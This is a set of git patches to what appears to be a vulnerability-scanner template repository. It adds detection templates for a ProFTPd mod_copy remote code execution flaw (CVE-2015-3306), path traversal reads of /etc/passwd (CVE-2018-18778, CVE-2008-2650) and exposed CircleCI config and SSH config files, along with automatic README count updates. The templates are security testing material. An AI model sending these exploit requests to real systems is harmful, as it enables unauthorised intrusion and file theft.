From ec845a16df1eb03198f51164c0a0a5bf0ce7b3c3 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 24 Feb 2021 05:13:48 +0700 Subject: [PATCH 01/17] :fire: Add CVE-2015-3306 --- cves/2015/CVE-2015-3306.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2015/CVE-2015-3306.yaml diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml new file mode 100644 index 0000000000..d12eef18c2 --- /dev/null +++ b/cves/2015/CVE-2015-3306.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-3306 + +info: + name: ProFTPd RCE + author: pd-team + severity: high + reference: https://github.com/t0kx/exploit-CVE-2015-3306 + tags: cve,cve2015,ftp,rce + +network: + - inputs: + - data: "site cpfr /proc/self/cmdline\r\n" + read: 1024 + - data: "site cpto /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpfr /tmp/.{{randstr}}\r\n" + read: 1024 + - data: "site cpto /var/www/html/{{randstr}}\r\n" + host: + - "{{Hostname}}" + # port: + # - 21 + read-size: 1024 + matchers: + - type: word + words: + - "Copy successful" \ No newline at end of file From ad8ebf7f0a6d490fc2c87439269a3ff122a778d7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 21:35:18 +0530 Subject: [PATCH 02/17] Adding CVE-2018-18778 --- cves/2018/CVE-2018-18778.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2018/CVE-2018-18778.yaml diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml new file mode 100644 index 0000000000..59a103811e --- /dev/null +++ b/cves/2018/CVE-2018-18778.yaml @@ -0,0 +1,24 @@ +id: CVE-2018-18778 + +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: high + reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + tags: cve,cve2018,lfi +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + Content-Length: 4 + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" From ea0efacb13fb427b5cdac35e7cc48b5d539352aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 16:06:02 +0000 Subject: [PATCH 03/17] Auto Update README [Thu Feb 25 16:06:02 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33d51dc616..699830976b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 98 | exposed-panels | 74 | +| cves | 207 | vulnerabilities | 98 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 13 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 603 files**. +**62 directories, 604 files**. From 13155a5e705057306e678d8ff6f2baefc298bad4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:10:42 +0000 Subject: [PATCH 04/17] Create circleci-config.yaml --- exposures/configs/circleci-config.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-config.yaml diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml new file mode 100644 index 0000000000..bd3b8c8df1 --- /dev/null +++ b/exposures/configs/circleci-config.yaml @@ -0,0 +1,25 @@ +id: circleci-config + +info: + name: circleci config.yml exposure + author: geeknik + severity: medium + reference: https://circleci.com/docs/2.0/sample-config/ + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/config.yml" + - "{{BaseURL}}/.circleci/config.yml" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "jobs:") == true' + + - type: status + status: + - 200 From 223d3903886167c1c3cb7190bdbfeb22e222d8d5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:15:59 +0000 Subject: [PATCH 05/17] Update circleci-config.yaml Changing severity from medium to low. --- exposures/configs/circleci-config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index bd3b8c8df1..4c5593a45a 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -3,7 +3,7 @@ id: circleci-config info: name: circleci config.yml exposure author: geeknik - severity: medium + severity: low reference: https://circleci.com/docs/2.0/sample-config/ requests: From 0bfb348b744173a0eb11ed6786786f70467fbaf5 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:04 +0000 Subject: [PATCH 06/17] Create circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposures/configs/circleci-ssh-config.yaml diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml new file mode 100644 index 0000000000..59e81e5ea9 --- /dev/null +++ b/exposures/configs/circleci-ssh-config.yaml @@ -0,0 +1,25 @@ +id: circleci-ssh-config + +info: + name: circleci ssh-config exposure + author: geeknik + severity: low + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/.circleci/ssh-config" + + matchers-condition: and + matchers: + - type: word + words: + - "Host" + - "HostName" + - "IdentityFile" + + - type: status + status: + - 200 From 70f3204d5390099cbde5786558f69afc6821186d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 9 Mar 2021 21:40:35 +0000 Subject: [PATCH 07/17] Update circleci-config.yaml --- exposures/configs/circleci-config.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/configs/circleci-config.yaml b/exposures/configs/circleci-config.yaml index 4c5593a45a..294bb13505 100644 --- a/exposures/configs/circleci-config.yaml +++ b/exposures/configs/circleci-config.yaml @@ -11,7 +11,6 @@ requests: redirects: true max-redirects: 3 path: - - "{{BaseURL}}/config.yml" - "{{BaseURL}}/.circleci/config.yml" matchers-condition: and From 52c05621560dc807b36be4c2cf8b092911e74422 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Wed, 10 Mar 2021 14:30:35 +0700 Subject: [PATCH 08/17] :hammer: Move port inside host --- cves/2015/CVE-2015-3306.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index d12eef18c2..3de158bcb7 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml @@ -17,9 +17,7 @@ network: read: 1024 - data: "site cpto /var/www/html/{{randstr}}\r\n" host: - - "{{Hostname}}" - # port: - # - 21 + - "{{Hostname}}:21" read-size: 1024 matchers: - type: word From f20adaf50486dd2c153d03733d123cbc68fbdd29 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 10 Mar 2021 09:18:54 +0000 Subject: [PATCH 09/17] Update CVE-2008-2650.yaml --- cves/2008/CVE-2008-2650.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2008/CVE-2008-2650.yaml b/cves/2008/CVE-2008-2650.yaml index aa427af7be..68b9e4ba42 100644 --- a/cves/2008/CVE-2008-2650.yaml +++ b/cves/2008/CVE-2008-2650.yaml @@ -9,6 +9,7 @@ requests: - raw: - | GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and From 0b1e21dddb83ca2729d67f77f39e8d41e4bf0e1c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:14:19 +0530 Subject: [PATCH 10/17] syntax update --- fuzzing/iis-shortname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 1a2db42b20..3c3c4a7e28 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -46,8 +46,8 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 + req-condition: true matchers: - type: dsl - name: iis-scan dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" From 01e25a5d1e1aa8070ae52e2be19cd7642ed24bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 13:47:27 +0000 Subject: [PATCH 11/17] Auto Update README [Thu Mar 11 13:47:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37d784efe8..b4ba60dc51 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 61 | technologies | 50 | misconfiguration | 54 | +| exposures | 62 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 712 files**. +**75 directories, 713 files**. From d3ee173adeeff3ab3cd6d5f483f01bd88ced3999 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 19:47:22 +0530 Subject: [PATCH 12/17] Adding updated syntax --- cves/2019/CVE-2019-11869.yaml | 1 + exposed-panels/identityguard-selfservice-entrust.yaml | 1 + misconfiguration/put-method-enabled.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 27c0bf4a94..8a92db1344 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -33,6 +33,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Upgrade-Insecure-Requests: 1 + req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml index 771b21408a..a8cfb6d388 100644 --- a/exposed-panels/identityguard-selfservice-entrust.yaml +++ b/exposed-panels/identityguard-selfservice-entrust.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" + req-condition: true redirects: true max-redirects: 2 matchers: diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 33f999e808..1e10bad487 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -19,6 +19,7 @@ requests: GET /testing-put.txt HTTP/1.1 Content-Type: text/plain + req-condition: true matchers: - type: dsl name: multi-req From ff4df95a5ee4a9e185aa413363dd47244cad9786 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Mar 2021 14:29:16 +0000 Subject: [PATCH 13/17] Update circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml index 59e81e5ea9..2d6eb7e18a 100644 --- a/exposures/configs/circleci-ssh-config.yaml +++ b/exposures/configs/circleci-ssh-config.yaml @@ -19,6 +19,7 @@ requests: - "Host" - "HostName" - "IdentityFile" + condition: and - type: status status: From b32604fe6dbdc7bd170a626ac968d3df06dfe792 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 14:32:04 +0000 Subject: [PATCH 14/17] Auto Update README [Thu Mar 11 14:32:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b4ba60dc51..d73c7cc75c 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 62 | technologies | 50 | misconfiguration | 54 | +| exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 713 files**. +**75 directories, 714 files**. From 29d52ecc58de155c31e9401b4f11f40589d5104e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 15:08:44 +0000 Subject: [PATCH 15/17] Auto Update README [Thu Mar 11 15:08:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d73c7cc75c..a8323e802b 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 236 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 714 files**. +**75 directories, 715 files**. From 80ef150bb77ceadeff9021627b9c0c36b83ad6bd Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 20:44:26 +0530 Subject: [PATCH 16/17] Update CVE-2015-3306.yaml --- cves/2015/CVE-2015-3306.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2015/CVE-2015-3306.yaml b/cves/2015/CVE-2015-3306.yaml index d12eef18c2..82458684b3 100644 --- a/cves/2015/CVE-2015-3306.yaml +++ b/cves/2015/CVE-2015-3306.yaml @@ -5,7 +5,7 @@ info: author: pd-team severity: high reference: https://github.com/t0kx/exploit-CVE-2015-3306 - tags: cve,cve2015,ftp,rce + tags: cve,cve2015,ftp,rce,network network: - inputs: @@ -18,10 +18,10 @@ network: - data: "site cpto /var/www/html/{{randstr}}\r\n" host: - "{{Hostname}}" - # port: - # - 21 + read-size: 1024 matchers: - type: word words: - - "Copy successful" \ No newline at end of file + - "Copy successful" + part: raw \ No newline at end of file From 6469f38cf49e2593c511f7fa494104d90d69efad Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 15:16:36 +0000 Subject: [PATCH 17/17] Auto Update README [Thu Mar 11 15:16:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a8323e802b..1ed2f0d10a 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 236 | vulnerabilities | 105 | exposed-panels | 104 | +| cves | 237 | vulnerabilities | 105 | exposed-panels | 104 | | exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 715 files**. +**75 directories, 716 files**.